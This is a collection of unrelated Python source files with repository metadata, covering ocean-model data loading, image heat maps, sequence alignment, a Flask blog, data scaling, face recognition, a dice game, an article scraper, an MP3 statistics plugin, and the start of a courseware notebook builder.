MITgcmSimMetadata:\n\n def __init__(self, start_datetime, deltaT, data_dir, grid_dir):\n\n self.start_datetime = pd.Timestamp(start_datetime)\n self.deltaT = deltaT\n self.data_dir = data_dir\n self.grid_dir = grid_dir\n \n\ndef getItersFromDate(dt, msm : MITgcmSimMetadata):\n \n if type(dt) == str:\n dt = pd.Timestamp(dt) \n \n delta_seconds = (dt - msm.start_datetime).total_seconds()\n iters = delta_seconds / msm.deltaT\n\n if iters % 1 != 0:\n raise Exception(\"The specified time is not a multiple of deltaT. 
Please check if deltaT is correct.\")\n \n iters = int(iters)\n \n return iters\n\ndef getDateFromIters(iters, msm : MITgcmSimMetadata):\n \n return msm.start_datetime + pd.Timedelta(seconds=msm.deltaT) * iters\n\n\n\n\ndef loadDataByDate(dt, msm : MITgcmSimMetadata, region=None, lev=(), merge=True, datasets=[]):\n \n data = dict()\n\n iters = getItersFromDate(dt, msm)\n \n for k in datasets:\n \n print(\"Loading file of \", k)\n\n\n kwargs = dict(\n region=region,\n returnmeta=True,\n )\n\n if k in [\"diag_state\", \"diag_Tbdgt\"]:\n kwargs[\"lev\"] = lev\n\n bundle = mds.rdmds(\"%s/%s\" % (msm.data_dir, k,), iters, **kwargs)\n _data = lf.postprocessRdmds(bundle)\n\n\n if merge:\n for varname, vardata in _data.items():\n data[varname] = vardata\n\n else:\n data[k] = _data\n\n\n return data\n\n\n\n\n","repo_name":"meteorologytoday/project-coastal-AR-high-res","sub_path":"src/diag/data_loading_helper.py","file_name":"data_loading_helper.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18112614241","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n\nalpha=0.15\nbelta=0.11\nday='morning'\npath = '/home/kirin/Python_Code/red-green-blindness/video_maker/final/'+day+'/'\n\nOut_path = '/home/kirin/Python_Code/red-green-blindness/video_maker/output_video/OutPut_aft.mp4'\nfilelist = os.listdir(path)\n\ninput_dir='/run/media/kirin/新加卷1/images/'\npath=input_dir\nfilelist = []\nwith open(input_dir+day+'.txt','r')as f:\n ls=f.readlines()\n for l in ls:\n l=l.strip('\\n')\n # if l[len('2019-03-21-15_04_11_'):-len('.png')] =='116.394362_39.93587599999999':\n filelist.append(input_dir+day+'/'+l)\n\nprint(filelist)\na=Image.open(filelist[0])\na.show()\nexit()\ncolor_dic = {'RED_l': np.array([0, 0, 220]), 'RED_h': np.array([0, 0, 222]),\n 'YELLO_l': np.array([0, 202, 253]), 'YELLO_h': np.array([0, 204, 255]),\n 'GREEN_l': np.array([0, 175, 49]), 'GREEN_h': np.array([0, 177, 51]),\n 'DEEPRED_l': np.array([13, 13, 138]), 'DEEPRED_h': np.array([13, 13, 140]), }\n\n\ndef get_line(frame):\n # get mask\n r = cv2.inRange(frame, color_dic['RED_l'], color_dic['RED_h'])\n y = cv2.inRange(frame, color_dic['YELLO_l'], color_dic['YELLO_h'])\n g = cv2.inRange(frame, color_dic['GREEN_l'], color_dic['GREEN_h'])\n dr = cv2.inRange(frame, color_dic['DEEPRED_l'], color_dic['DEEPRED_h'])\n mask = r + y + g + dr\n # mask = g\n res = cv2.bitwise_and(frame, frame, mask=mask)\n return mask, g, y, r, dr\n # return res\n\n\nfilelist.sort()\n\nhot_map = 0\ncount = 0\nfor index, item in enumerate(filelist):\n try:\n if item.endswith('.png'):\n name_str = item.split('.')[0]\n # item = path + item\n img = cv2.imread(item)\n\n aft_img, g, y, r, dr = get_line(img)\n hot_map += 0 * np.sign(g) + 0 * np.sign(y) + 2 * np.sign(r) + 2 * np.sign(dr)\n count += 1\n print(item)\n except Exception as e:\n print(e)\n print('erro!')\n pass\n\nhot_map += 1 * np.sign(g) + 1 * np.sign(y) + 1 * np.sign(r) + 1 * np.sign(dr)\n\ntotal_time = count * 2\n\nmap = hot_map / total_time\n\n\n# np.save(\"data.npy\", map)\n\nprint(count)\n\n# map = np.load(\"data.npy\")\n\nprint(np.max(map))\n\n\nred = map > alpha\nyellow = (map > belta) & (map <= alpha)\ngreen = (map <= belta) & (map > 0)\n\nred = red[:, :, np.newaxis]\nyellow = yellow[:, :, np.newaxis]\ngreen = green[:, :, np.newaxis]\n\nred = np.repeat(red, 3, axis=2)\nyellow = np.repeat(yellow, 3, axis=2)\ngreen = np.repeat(green, 3, axis=2)\n\nred = 
red * color_dic['RED_l']\nyellow = yellow * color_dic['YELLO_l']\ngreen = green * color_dic['GREEN_l']\n\nfinal = red + yellow + green\n\ncv2.imwrite(day+\"_final.png\", final)\n","repo_name":"kirin-intelligence/red-green-blindness","sub_path":"video_maker/RGB_color.py","file_name":"RGB_color.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73906183306","text":"a=\"ATGAGTCTCT\"\r\nb=\"CTGTCTCCTG\"\r\n#пример последовательностей\r\nDNAfull = [[5,-4, -4, -4], [-4, 5, -4, -4], [-4, -4, 5, -4], [-4, -4, -4, 5]]\r\ndDNA = {['C', 'T', 'A', 'G'][a]: a for a in range (4)}\r\nd=-10\r\nm=[[i*d for i in range(len(a)+1)],[0]*(len(a)+1)]\r\n\r\n\r\nl=['P','D','V']\r\nrow=[]\r\nfor i in range(1,len(b)+1):\r\n line=[]\r\n for j in range(1,len(a)+1):\r\n pos=[m[1][j-1]+d,m[0][j-1]+DNAfull[dDNA[a[j-1]]][dDNA[b[i-1]]],m[0][j]+d]\r\n ds=dict(zip(pos,l))\r\n m[1][j]=max(pos)\r\n line.append(ds[int(m[1][j])])\r\n m[0][0],m[1][0]=i*d,i*d\r\n m[0]=m[1].copy()\r\n row.append(line)\r\n\r\nimport numpy as np\r\nroute = np.asarray(row)\r\n\r\n\r\nresa = ''\r\nresb = ''\r\nprov = np.empty(shape=(0, 0))\r\n\r\nwhile a != '' and b != '':\r\n if route[-1, -1] == 'V':\r\n resa = '-' + resa\r\n resb = b[-1] + resb\r\n b = b[:-1]\r\n\r\n route = route[:-1]\r\n elif route[-1, -1] == 'P':\r\n resa = a[-1] + resa\r\n a = a[:-1]\r\n resb = '-' + resb\r\n route = route[:, :-1]\r\n else:\r\n resa = a[-1] + resa\r\n a = a[:-1]\r\n resb = b[-1] + resb\r\n b = b[:-1]\r\n route = route[:-1, :-1]\r\n\r\nprint(resa+'\\n'+resb)\r\n","repo_name":"GeorgyVladimirskiy/bioinf_dz_3","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38357368457","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: blog\n Description :\n Author : ybw\n date: 2020/8/13\n-------------------------------------------------\n Change Activity:\n 2020/8/13:\n-------------------------------------------------\n\"\"\"\nfrom flask import render_template, flash, redirect, url_for, request, current_app, Blueprint, abort, make_response\nfrom flask_login import current_user\n\n# from ..emails import send_new_comment_email, send_new_reply_email\nfrom ..emails import send_new_reply_email, send_new_comment_email\nfrom ..extensions import db\n# from ..forms import CommentForm, AdminCommentForm\nfrom ..forms import AdminCommentForm, CommentForm\nfrom ..models import Post, Category, Comment\n\n# from .utils import redirect_back\nfrom ..utils import redirect_back\n\nblog_bp = Blueprint('blog', __name__)\n\n\n# pagination = Post.query.order_by(Post.timestamp.desc()).paginate(1, per_page=10)\n\n@blog_bp.route('/')\ndef index():\n \"\"\"\n 显示主页内容\n :return:\n \"\"\"\n # 参数出现了类型错误,会返回1首页\n page = request.args.get('page', 1, type=int)\n per_page = current_app.config['BLUELOG_POST_PER_PAGE']\n # 为了实现分类, 不再是all , 而是 paginate 返回page页的记录,把记录分成几页\n # paginate(error_out=True),如果页面超过最大值,page或per_page为负数或非整数会返回404,如果是false,返回空记录.. max_per_page参数用来设置每页数量的最大值\n # pagination 对象是一个链表,每一个节点元素是pages . 
pagination.pages=5 pagination.total=50\n pagination = Post.query.order_by(Post.timestamp.desc()).paginate(page, per_page=per_page)\n posts = pagination.items\n return render_template('blog/index.html', pagination=pagination, posts=posts)\n\n\n@blog_bp.route('/about')\ndef about():\n \"\"\"\n admin about\n :return:\n \"\"\"\n return render_template('blog/about.html')\n\n\n@blog_bp.route('/category/')\ndef show_category(category_id):\n \"\"\"\n 显示分类列表\n :param category_id:\n :return:\n \"\"\"\n category = Category.query.get_or_404(category_id)\n page = request.args.get('page', 1, type=int)\n per_page = current_app.config['BLUELOG_POST_PER_PAGE']\n # posts = category.posts 这样只是获取所有列表,而我们需要对这些文章记录附加其他查询过滤器和方法\n # Post.query.with_parent(category)获取了跟category相关的5个Post,且还是query对象可以执行order_by\n pagination = Post.query.with_parent(category).order_by(Post.timestamp.desc()).paginate(page, per_page)\n posts = pagination.items\n return render_template('blog/category.html', category=category, pagination=pagination, posts=posts)\n\n\n@blog_bp.route('/post/', methods=['GET', 'POST'])\ndef show_post(post_id):\n \"\"\"\n 显示文章正文\n :param post_id:\n :return:\n \"\"\"\n # get_or_404 没有找到抛出 abort(404) 错误\n post = Post.query.get_or_404(post_id)\n page = request.args.get('page', 1, type=int)\n # 评论分页\n per_page = current_app.config['BLUELOG_COMMENT_PER_PAGE']\n pagination = Comment.query.with_parent(post).filter_by(reviewed=True).order_by(Comment.timestamp.asc()).paginate(\n page, per_page)\n # 拿到跟页面相关所有reviewed = true 的评论\n comments = pagination.items\n # 如果当前用户已登录,使用管理员表单\n if current_user.is_authenticated:\n form = AdminCommentForm()\n form.author.data = current_user.name\n form.email.data = current_app.config['BLUELOG_EMAIL']\n form.site.data = url_for('.index')\n from_admin = True\n reviewed = True\n else: # 未登录则使用普通表单\n form = CommentForm()\n from_admin = False\n reviewed = False\n # 用户填写Comment表单,POST到后端,填入数据库内\n if form.validate_on_submit():\n author = form.author.data\n email = form.email.data\n site = form.site.data\n body = form.body.data\n # 这里需要注意post赋值的是Post对象,因为post表的字段是relationship\n comment = Comment(\n author=author, email=email, site=site, body=body,\n from_admin=from_admin, post=post, reviewed=reviewed)\n replied_id = request.args.get('reply')\n # 是否是回复,如果是回复,\n if replied_id:\n replied_comment = Comment.query.get_or_404(replied_id)\n comment.replied = replied_comment #双向绑定,comment.replied 就是父亲是 replied_comment , replied_comment.replies是评论的回复\n send_new_reply_email(replied_comment)\n db.session.add(comment)\n db.session.commit()\n if current_user.is_authenticated: # send message based on authentication status\n flash('Comment published.', 'success')\n else:\n flash('Thanks, your comment will be published after reviewed.', 'info')\n send_new_comment_email(post) # send notification email to admin\n # 提及表单,返回到原页面\n return redirect(url_for('.show_post', post_id=post_id))\n return render_template('blog/post.html', post=post, pagination=pagination, form=form, comments=comments)\n\n\n@blog_bp.route('/reply/comment/')\ndef reply_comment(comment_id):\n \"\"\"\n reply comment\n :param comment_id: 触发评论的id\n :return:\n \"\"\"\n # 点击replay 回到这个接口构造 .show_post\n comment = Comment.query.get_or_404(comment_id)\n if not comment.post.can_comment:\n flash('Comment is disabled.', 'warning')\n # 跳回该文章\n return redirect(url_for('.show_post', post_id=comment.post.id))\n # 构造replay和author跳回到.show_post该路径下comment-form下,让用户填写评论\n return redirect(\n url_for('.show_post', post_id=comment.post_id, reply=comment_id, 
author=comment.author) + '#comment-form')\n\n\n@blog_bp.route('/change-theme/')\ndef change_theme(theme_name):\n if theme_name not in current_app.config['BLUELOG_THEMES'].keys():\n abort(404)\n\n response = make_response(redirect_back())\n response.set_cookie('theme', theme_name, max_age=30 * 24 * 60 * 60)\n return response\n","repo_name":"yubowen0525/Personal_Blog","sub_path":"project/blueprints/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11971381728","text":"#PREPARE FUNCTION USED TO SCALE WRANGLED ZILLOW DATA TO PREPARE FOR MODELING\n# using min max scaling method\n\n#a. imports\n\n#b. scale\n# list columns to scale\n# create scaling object\n# fit scaling object to train data\n# transform datasets\n# transform train\n# transform validate\n# transform test\n\n#a.IMPORTS\n#******************************************************************************\nimport wrangle\n\nimport sklearn.preprocessing\n\n\n#b. SCALE\n#******************************************************************************\ndef scale_zillow(test, validate, train):\n \n #listing columns to scale, all excepts fips\n cols_to_scale = train.drop(columns = ['bedrooms', 'bathrooms', 'year_built', 'fips']).columns.to_list()\n \n #create scaler object\n scaler = sklearn.preprocessing.MinMaxScaler()\n \n #fit scaler object to train\n scaler = scaler.fit(train[cols_to_scale])\n \n #transform data\n scaled_train = scaler.transform(train[cols_to_scale])\n scaled_validate = scaler.transform(validate[cols_to_scale])\n scaled_test = scaler.transform(test[cols_to_scale])\n \n return scaled_train, scaled_validate, scaled_test\n ","repo_name":"stephanie-jones78/regression_exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16222388810","text":"import os\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom facenet_pytorch import MTCNN\n\nimport PIL\n\nfrom collections import defaultdict\nimport random\nimport glob\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nmtcnn = MTCNN(\n image_size=160, margin=0, min_face_size=20,\n thresholds=[0.6, 0.7, 0.7], factor=0.709, post_process=True,\n device=device\n)\n\n\nclass Base(DataSet):\n def __init__(self, data_path, data_size, transforms=None):\n super(Base, self).__init__()\n self.data_path = data_path\n self.data_size = data_size\n self.transforms = transforms\n self.data_dict = self.read_files()\n \n def read_files(self):\n work_dir = os.getcwd()\n os.chdir(self.data_path)\n data_dict = defaultdict(dict)\n\n try:\n for file in glob.glob('./*'):\n path_split = file.split('/')[1:]\n data_dict[path_split[0]] = glob.glob(path_split[0]+'/*')\n except Exception as e:\n print(e)\n os.chdir(work_dir)\n os.chdir(work_dir)\n return data_dict\n \n def __len__(self):\n return self.data_size\n\nclass TestData(Base):\n def __init__(self, data_path, data_size, n_ways, transforms=None):\n super(Base, self).__init__(data_path, data_size, transforms)\n self.nways = n_ways\n \n def __getitem__(self, index):\n cats = random.sample(self.data_dict.keys(), self.n_ways)\n \n main_img = pos_img = None\n while None in [main_img, pos_img]:\n main_img, pos_img = [mtcnn(PIL.Image.open(self.data_path + '/' + img)) for img in \\\n random.sample(self.data_dict[cats[0]], 2)]\n \n test_set = []\n 
while (len(test_set)!=(self.n_ways-1)):\n cat = random.choice(cats[1:])\n img = mtcnn(PIL.Image.open(self.data_path + '/' + random.choice(self.data_dict[cat])))\n if img is None:\n continue\n test_set.append(img)\n test_set.append(pos_img)\n \n test_set = torch.stack(test_set)\n return (main_img, test_set)","repo_name":"shreyasrbhat/FaceRecognition","sub_path":"app/face_recog/models/networks/face_recognition/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70975456905","text":"import random\nfrom library_functions import get_library\nfrom dice_list import DiceList, create_ddm_dice\n\nclass DicePool(DiceList):\n \"\"\"\n Set of 15 dice used by a player to play the game.\n \"\"\"\n def __init__(self, log):\n super().__init__(\"dice pool\", log, 15)\n\n def fill_random(self, library):\n \"\"\"\n Fill the dice pool with random dice from a dice \n library.\n \"\"\"\n library_items = list(library.items())\n # add random dices until the dice pull is full\n while not self.is_full():\n # random index\n dice_id, params = random.choice(library_items)\n dice = create_ddm_dice(params)\n self.add(dice)\n\n def fill_from_ids(self, id_list, library):\n \"\"\"\n Fill dice pool from id an id list. The dice is \n extracted from the dice library with the same ids.\n \"\"\"\n keys = library.keys()\n for id in id_list:\n if id in keys:\n params = library[id]\n else:\n self.log.add(\"Invalid dice ID \" + str(id) +\n \", skipping.\\n\")\n continue\n dice = create_ddm_dice(params)\n self.add(dice)\n\n","repo_name":"francocurotto/YDDM-re-old","sub_path":"source/game_logic/ddm_list/dice_pool.py","file_name":"dice_pool.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18942188625","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\n\n_url = 'http://cyberleninka.ru/article'\n\n\nclass Article:\n\n\tdef __init__(self,url):\n\t\tsoup = BeautifulSoup(get_html(url))\n\n\t\tfor point in soup.find_all('p', itemprop='description'): self.summary = point.get_text()\n\t\tfor point in soup.find_all('p', itemprop='articleBody'): self.body = point.get_text()\n\t\tfor point in soup.find_all('span', itemprop='headline'): self.head = point.get_text()\n\n\tdef serialize(self):\n\t\treturn {'head': self.head, 'body': self.body, 'summary': self.summary}\n\n\ndef get_html(url):\n\tresponse = urllib.request.urlopen(url)\n\treturn response.read()\n\n\ndef get_number_of_last_page(url):\n\tsoup = BeautifulSoup(get_html(url))\n\tfor link in soup.find_all('a',class_='last link-page'): return int(link.get('page'))\n\n\ndef parse_category(url):\n\tcategory_list = list()\n\tsoup = BeautifulSoup(get_html(url))\n\tcatalog = soup.find('div', class_='catalog-article')\n\tfor group in catalog.find_all('li')[2:]:\n\t\tif group.a is not None:\n\t\t\tcategory_list.append((group.a.get_text(),'http://cyberleninka.ru' + group.a.get('href')))\t\n\treturn category_list\n\n\ndef get_articles_urls(url):\n\tarticles_urls = list()\n\tfor i in range(1,get_number_of_last_page(url)+1):\n\t\tsoup = BeautifulSoup(get_html(url+'/'+str(i)))\n\t\tfor article in soup.find_all('span', class_='heading-text'):\n\t\t\tif article.a is not None:\n\t\t\t\tart_links = 'http://cyberleninka.ru' + article.a.get('href')\n\t\t\tarticles_urls.append(art_links)\n\t\tprint(url+'/'+str(i))\n\treturn 
articles_urls\n","repo_name":"peter-the-void/analysis-scientific-articles","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42169095761","text":"from __future__ import print_function\nimport sys, os, operator\nfrom collections import Counter\n\nfrom eyed3 import id3\nfrom eyed3.core import AUDIO_MP3\nfrom eyed3.utils import guessMimetype, cli\nfrom eyed3.plugins import LoaderPlugin\n\nID3_VERSIONS = [id3.ID3_V1_0, id3.ID3_V1_1,\n id3.ID3_V2_2, id3.ID3_V2_3, id3.ID3_V2_4]\n\n_OP_STRINGS = {operator.le: \"<=\",\n operator.lt: \"< \",\n operator.ge: \">=\",\n operator.gt: \"> \",\n operator.eq: \"= \",\n operator.ne: \"!=\",\n }\n\nclass Stat(Counter):\n TOTAL = \"total\"\n\n def __init__(self, *args, **kwargs):\n super(Stat, self).__init__(*args, **kwargs)\n self[self.TOTAL] = 0\n self._key_names = {}\n\n def compute(self, file, audio_file):\n self[self.TOTAL] += 1\n self._compute(file, audio_file)\n\n def _compute(self, file, audio_file):\n pass\n\n def report(self):\n self._report()\n\n def _sortedKeys(self, most_common=False):\n def keyDisplayName(k):\n return self._key_names[k] if k in self._key_names else k\n\n key_map = {}\n for k in self.keys():\n key_map[keyDisplayName(k)] = k\n\n if not most_common:\n sorted_names = list(key_map.keys())\n sorted_names.remove(self.TOTAL)\n sorted_names.sort()\n sorted_names.append(self.TOTAL)\n else:\n most_common = self.most_common()\n sorted_names = []\n remainder_names = []\n for k, v in most_common:\n if k != self.TOTAL and v > 0:\n sorted_names.append(keyDisplayName(k))\n elif k != self.TOTAL:\n remainder_names.append(keyDisplayName(k))\n\n remainder_names.sort()\n sorted_names = sorted_names + remainder_names\n sorted_names.append(self.TOTAL)\n\n return [key_map[name] for name in sorted_names]\n\n def _report(self, most_common=False):\n keys = self._sortedKeys(most_common=most_common)\n\n key_col_width = 0\n val_col_width = 0\n for key in keys:\n key = self._key_names[key] if key in self._key_names else key\n key_col_width = max(key_col_width, len(str(key)))\n val_col_width = max(val_col_width, len(str(self[key])))\n key_col_width += 1\n val_col_width += 1\n\n for k in keys:\n key_name = self._key_names[k] if k in self._key_names else k\n value = self[k]\n percent = self.percent(k) if value and k != \"total\" else \"\"\n print(\"%(padding)s%(key)s:%(value)s%(percent)s\" % \n { \"padding\": ' ' * 4,\n \"key\": str(key_name).ljust(key_col_width),\n \"value\": str(value).rjust(val_col_width),\n \"percent\": \" ( %s%.2f%%%s )\" % \n (cli.GREEN, percent, cli.RESET) if percent\n else \"\",\n })\n\n def percent(self, key):\n return (float(self[key]) / float(self[\"total\"])) * 100\n\n\nclass AudioStat(Stat):\n def compute(self, audio_file):\n assert(audio_file)\n self[\"total\"] += 1\n self._compute(audio_file)\n\n def _compute(self, audio_file):\n pass\n\n\nclass FileCounterStat(Stat):\n def __init__(self):\n super(FileCounterStat, self).__init__()\n for k in (\"audio\", \"hidden\", \"audio (other)\"):\n self[k] = 0\n\n def _compute(self, file, audio_file):\n if audio_file:\n self[\"audio\"] += 1\n if os.path.basename(file).startswith('.'):\n self[\"hidden\"] += 1\n mt = guessMimetype(file)\n if mt and mt.startswith(\"audio/\") and not audio_file:\n self[\"unsupported (other)\"] += 1\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"Files:\" + cli.RESET)\n super(FileCounterStat, 
self)._report()\n\n\nclass MimeTypeStat(Stat):\n def _compute(self, file, audio_file):\n mt = guessMimetype(file)\n self[mt] += 1\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"Mime-Types:\" + cli.RESET)\n super(MimeTypeStat, self)._report(most_common=True)\n\n\nclass Id3VersionCounter(AudioStat):\n def __init__(self):\n super(Id3VersionCounter, self).__init__()\n for v in ID3_VERSIONS:\n self[v] = 0\n self._key_names[v] = id3.versionToString(v)\n\n def _compute(self, audio_file):\n if audio_file.tag:\n self[audio_file.tag.version] += 1\n else:\n self[None] += 1\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"ID3 versions:\" + cli.RESET)\n super(Id3VersionCounter, self)._report()\n\n\nclass BitrateCounter(AudioStat):\n def __init__(self):\n super(BitrateCounter, self).__init__()\n self[\"cbr\"] = 0\n self[\"vbr\"] = 0\n self.bitrate_keys = [(operator.le, 96),\n (operator.le, 112),\n (operator.le, 128),\n (operator.le, 160),\n (operator.le, 192),\n (operator.le, 256),\n (operator.le, 320),\n (operator.gt, 320),\n ]\n for k in self.bitrate_keys:\n self[k] = 0\n op, bitrate = k\n self._key_names[k] = \"%s %d\" % (_OP_STRINGS[op], bitrate)\n\n def _compute(self, audio_file):\n if audio_file.type != AUDIO_MP3 or audio_file.info is None:\n self[\"total\"] -= 1\n return\n\n vbr, br = audio_file.info.bit_rate\n if vbr:\n self[\"vbr\"] += 1\n else:\n self[\"cbr\"] += 1\n\n for key in self.bitrate_keys:\n key_op, key_br = key\n if key_op(br, key_br):\n self[key] += 1\n break\n\n def _report(self):\n print(cli.BOLD + cli.GREY + \"MP3 bitrates:\" + cli.RESET)\n super(BitrateCounter, self)._report(most_common=True)\n\n def _sortedKeys(self, most_common=False):\n keys = super(BitrateCounter, self)._sortedKeys(most_common=most_common)\n keys.remove(\"cbr\")\n keys.remove(\"vbr\")\n keys.insert(0, \"cbr\")\n keys.insert(1, \"vbr\")\n return keys\n\n\nclass StatisticsPlugin(LoaderPlugin):\n NAMES = ['stats']\n SUMMARY = u\"Computes statistics for all audio files scanned.\"\n\n def __init__(self, arg_parser):\n super(StatisticsPlugin, self).__init__(arg_parser)\n self._stats = []\n\n self.file_counter = FileCounterStat()\n self._stats.append(self.file_counter)\n\n self.mt_stat = MimeTypeStat()\n self._stats.append(self.mt_stat)\n\n self.id3_version_counter = Id3VersionCounter()\n self._stats.append(self.id3_version_counter)\n\n self.bitrates = BitrateCounter()\n self._stats.append(self.bitrates)\n\n def handleFile(self, f):\n super(StatisticsPlugin, self).handleFile(f)\n sys.stdout.write('.')\n sys.stdout.flush()\n\n for stat in self._stats:\n if isinstance(stat, AudioStat):\n if self.audio_file:\n stat.compute(self.audio_file)\n else:\n stat.compute(f, self.audio_file)\n\n def handleDone(self):\n print(\"\\n\")\n for stat in self._stats:\n stat.report()\n print(\"\\n\")\n print()\n","repo_name":"uforia/Uforia","sub_path":"source/libraries/eyed3/plugins/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"81"} +{"seq_id":"73839310664","text":"from typing import Callable, Union, List\nfrom dbacademy_courseware.dbbuild import common\n\nD_TODO = \"TODO\"\nD_ANSWER = \"ANSWER\"\nD_SOURCE_ONLY = \"SOURCE_ONLY\"\nD_DUMMY = \"DUMMY\"\n\nD_INCLUDE_HEADER_TRUE = \"INCLUDE_HEADER_TRUE\"\nD_INCLUDE_HEADER_FALSE = \"INCLUDE_HEADER_FALSE\"\nD_INCLUDE_FOOTER_TRUE = \"INCLUDE_FOOTER_TRUE\"\nD_INCLUDE_FOOTER_FALSE = \"INCLUDE_FOOTER_FALSE\"\n\nSUPPORTED_DIRECTIVES = [D_SOURCE_ONLY, 
D_ANSWER, D_TODO, D_DUMMY,\n D_INCLUDE_HEADER_TRUE, D_INCLUDE_HEADER_FALSE, D_INCLUDE_FOOTER_TRUE, D_INCLUDE_FOOTER_FALSE, ]\n\n\nclass NotebookError:\n def __init__(self, message):\n self.message = message\n\n def __str__(self):\n return self.message\n\n def __repr__(self):\n return self.message\n\n\nclass NotebookDef:\n from dbacademy_courseware.dbbuild import BuildConfig\n\n def __init__(self,\n *,\n build_config: BuildConfig,\n path: str,\n replacements: dict,\n include_solution: bool,\n test_round: int,\n ignored: bool,\n order: int,\n i18n: bool,\n i18n_language: Union[None, str],\n ignoring: list,\n version: str):\n from dbacademy_courseware.dbbuild import BuildConfig\n\n assert type(build_config) == BuildConfig, f\"\"\"Expected the parameter \"build_config\" to be of type \"BuildConfig\", found \"{type(build_config)}\" \"\"\"\n assert type(path) == str, f\"\"\"Expected the parameter \"path\" to be of type \"str\", found \"{type(path)}\" \"\"\"\n assert type(replacements) == dict, f\"\"\"Expected the parameter \"replacements\" to be of type \"dict\", found \"{type(replacements)}\" \"\"\"\n assert type(include_solution) == bool, f\"\"\"Expected the parameter \"include_solution\" to be of type \"bool\", found \"{type(include_solution)}\" \"\"\"\n\n self.build_config = build_config\n self.client = build_config.client\n self.path = path\n self.replacements = replacements or dict()\n\n self.include_solution = include_solution\n self.errors: List[NotebookError] = list()\n self.warnings: List[NotebookError] = list()\n\n self.test_round = test_round\n self.ignored = ignored\n self.order = order\n\n self.i18n = i18n\n self.i18n_language = i18n_language\n self.i18n_guids = list()\n\n self.ignoring = ignoring\n self.version = version\n\n def __str__(self):\n result = self.path\n result += f\"\\n - include_solution = {self.include_solution}\"\n result += f\"\\n - replacements = {self.replacements}\"\n return result or \"\"\n\n def test(self, assertion: Callable[[], bool], message: str) -> bool:\n if assertion is None or not assertion():\n self.errors.append(NotebookError(message))\n return False\n else:\n return True\n\n def warn(self, assertion: Callable[[], bool], message: str) -> bool:\n if assertion is None or not assertion():\n self.warnings.append(NotebookError(message))\n return False\n else:\n return True\n\n def assert_no_warnings(self) -> None:\n if len(self.warnings) > 0:\n what = \"warning was\" if len(self.warnings) == 1 else \"warnings were\"\n print(f\"CAUTION: {len(self.warnings)} {what} found while publishing\")\n for warning in self.warnings:\n print(\"-\" * 80)\n print(warning.message)\n print()\n\n def assert_no_errors(self, print_warnings) -> None:\n if len(self.errors) > 0:\n what = \"error was\" if len(self.errors) == 1 else \"errors were\"\n print(f\"ABORTING: {len(self.errors)} {what} found while publishing\")\n for error in self.errors:\n print(\"-\" * 80)\n print(error.message)\n raise Exception(\"Publish aborted - see previous errors for more information\")\n\n if print_warnings:\n self.assert_no_warnings()\n\n def test_notebook_exists(self, i, what, original_target, target, other_notebooks):\n if not target.startswith(\"../\") and not target.startswith(\"./\"):\n self.warn(lambda: False, f\"Cmd #{i+1} | Found unexpected, relative, {what} target: \\\"{original_target}\\\" resolved as \\\"{target}\\\"\".strip())\n return\n\n all_paths = set()\n for other in other_notebooks:\n # Add the original notebook's path\n all_paths.add(other.path)\n\n # Get the notebook's 
directory\n directory = '/'.join(other.path.split(\"/\")[:-1])\n all_paths.add(directory)\n\n # While there are still parent directories, keep processing\n while directory.count(\"/\") > 0:\n directory = '/'.join(directory.split(\"/\")[:-1])\n all_paths.add(directory)\n\n offset = -1\n\n if target.startswith(\"../\"):\n while target.startswith(\"../\"):\n offset -= 1\n target = target[3:] \n\n elif target.startswith(\"./\"):\n target = target[2:]\n\n if \"/\" in self.path:\n parent = '/'.join(self.path.split(\"/\")[:offset])\n target = f\"{parent}/{target}\"\n\n if target.startswith(\"/\"): target = target[1:]\n\n notebooks = [n for n in all_paths if target == n]\n\n message = f\"Cmd #{i+1} | Cannot find notebook for the {what} target: \\\"{original_target}\\\" resolved as \\\"{target}\\\"\"\n # self.test(lambda: len(notebooks) != 0, message)\n self.test(lambda: len(notebooks) != 0, message)\n\n @staticmethod\n def get_latest_commit_id(repo_name):\n import requests\n repo_url = f\"https://api.github.com/repos/databricks-academy/{repo_name}/commits/published\"\n response = requests.get(repo_url)\n assert response.status_code == 200, f\"Expected 200, received {response.status_code}\"\n\n return response.json().get(\"sha\")\n\n @staticmethod\n def parse_version(command, url):\n import sys\n pos_a = command.find(url)\n assert pos_a >= 0, f\"Unable to find \\\"{url}\\\" in command string:\\n{command}\"\n pos_a += len(url)\n\n pos_x = command.find(\" \", pos_a)\n if pos_x < 0: pos_x = sys.maxsize\n\n pos_y = command.find(\"\\n\", pos_a)\n if pos_y < 0: pos_y = sys.maxsize\n\n end = len(command)+1\n\n pos_b = min(min(pos_x, pos_y), end)\n\n version = command[pos_a:pos_b]\n return version\n\n def update_git_commit(self, command: str, url: 